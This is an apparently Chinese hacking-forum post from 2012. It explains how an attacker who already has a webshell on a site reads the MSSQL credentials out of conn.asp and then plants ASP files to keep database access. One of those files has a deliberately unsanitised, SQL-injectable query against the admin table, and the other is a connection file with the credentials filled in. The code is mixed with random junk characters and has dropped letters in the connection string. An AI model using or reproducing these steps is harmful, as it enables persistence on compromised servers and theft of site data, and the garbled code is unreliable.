首先你要拿了一个webshell,这样你找到连接数据库的文件,大多都是conn.asp这个文件里面有mssql的用户和密码,你要找到用户名、密码、数据库所在的IP,然后连接上去,至于连接大家应该都会,找到网站管理员的表。因为我测试的时候是用管理员的表,我朋友说任何表名都可以,只要这个表存在,代码如下:
- G) d) F) L* Z) Z, x6 l2 iASP/Visual Basic代码* [; V5 T) e6 b$ w. q
<!--#include file="xx.asp"-->
0 Z, `! A7 B2 D: J<%
( }! X: M! ~6 q6 mset rs=server.createobject("ADODB.recordset") 8 ]) N/ H; P. D+ l) `7 q: E
id = request("id") " q3 W4 X5 Y( K. y* x M
strSQL = "select * from admin where id=" & id
" ~" w$ }& i! F" v brs.open strSQL,conn,1,3
- j% a+ E0 v2 W9 S+ urs.close ; M. D. v7 a: h0 t5 f6 g0 o
%>
! O" |6 p" S/ \2 F; d4 q- v$ V$ a把strSQL = "select * from admin where id=" & id 这句话里面的admin换成要伪造的表名,注意必须存在。你可以连接上去看下表名就是了!这里假设的是admin是表名!这个文件名随便保存!9 c/ s# v- e% f
然后就要构造一个连接数据库的文件了,代码如下:
0 R8 p1 V) E/ r9 Y$ [3 i- HASP/Visual Basic代码
5 y5 X! F. F M- D<% : ?% h9 W) V, t: m A7 p* k
strSQLServerName = "000.000.000.000" '服务器名称或地址
8 P9 p! K/ A; Y* i- o; QstrSQLDBUserName = "sqlname" '数据库帐号
3 O( u5 N8 I, kstrSQLDBPassword = "sqlpass" '数据库密码
i4 v+ M. O) q& e& Y O! VstrSQLDBName = "sqldataname" '数据库名称 $ ~' L' e$ V1 ]5 W
Set conn = Server.CreateObject("ADODB.Connection")
, x; h. c! X* a' o3 a d. f" P, w+ estrCon = "rovider=SQLOLEDB.1ersist Security Info=False;Server=" & strSQLServerName & ";User ID=" & strSQLDBUserName & "assword=" & strSQLDBPassword & ";Database=" & strSQLDBName & ";"
" D k1 ]9 o5 bconn.open strCon
" v; ^) f/ `/ b3 Y+ Z$ _6 }: B%>
$ |* o' C3 Y) o4 e3 t这里应该都会了,就不罗嗦了,不过注意的是保存的文件名要和include调用的名字一样。就这样,正常情况下,就OK了,伪造成功
- D2 ~( |! z, ?1 V7 M |
发表于 2012-9-13 17:53:08
收藏
支持
反对